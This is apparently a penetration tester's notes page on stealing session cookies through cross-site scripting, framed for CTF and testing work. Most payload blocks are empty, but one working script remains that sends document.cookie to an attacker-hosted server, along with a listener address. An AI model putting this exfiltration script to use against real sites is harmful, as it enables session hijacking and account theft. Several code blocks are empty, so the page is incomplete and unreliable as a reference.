# Stealing Cookies Stealing cookies to obtain privileges is the fever dream of hackers looking to exploit cross-site scripting vulnerabilities. ### Payloads #### Verification with alert() This payload will pop an `alert()` box prior to sending the cookie. This can be usefuil for testing a cross-site scripting payload and verifying that it is grabbing the intended information. Once the `alert()` box closes, the cookie will be sent to the arbitrary server: ```javascript ``` #### Exfiltrating cookies without alert() After verifying that the parameter is susceptible to cross-site scripting, we can leverage the following payload to exfiltrate cookies silently: ```javascript ``` #### CTF Only Payload The following payload leverages the `img` tag rather then `script` and will call `onerror()` in a loop, ultimately filling up your server with cookies. I have found this can be life-saving in a CTF when things may not be working as the author originally intended: ```javascript

``` #### My Preferred Method The way that I like to go about capturing cookies is submitting the following payload, calling back to a JavaScript file that I am host on a Python web server: ```javascript "> ``` The `xss.js` file looks like the following, ultimately it is doing the same as the above payloads by grabbing and sending the cookies to my hosted web server: ```javascript function pwn() { var img = document.createElement("img"); img.src = "http://172.0.0.1/xss?=" + document.cookie; document.body.appendChild(img); } pwn(); ``` ### Capturing the Cookies Unless you're in a CTF environment, I would highly recommend capturing the cookies on a local web server or controlled Burp collaborator instance. I'm not sure about you, but sending cookies to a random website seems like a bad idea to me. That being said, there are sites that exist such as `requestbin` to send the request to: ```javascript http://172.0.0.1:1337/ ``` ### References {% embed url="" %} {% embed url="" %}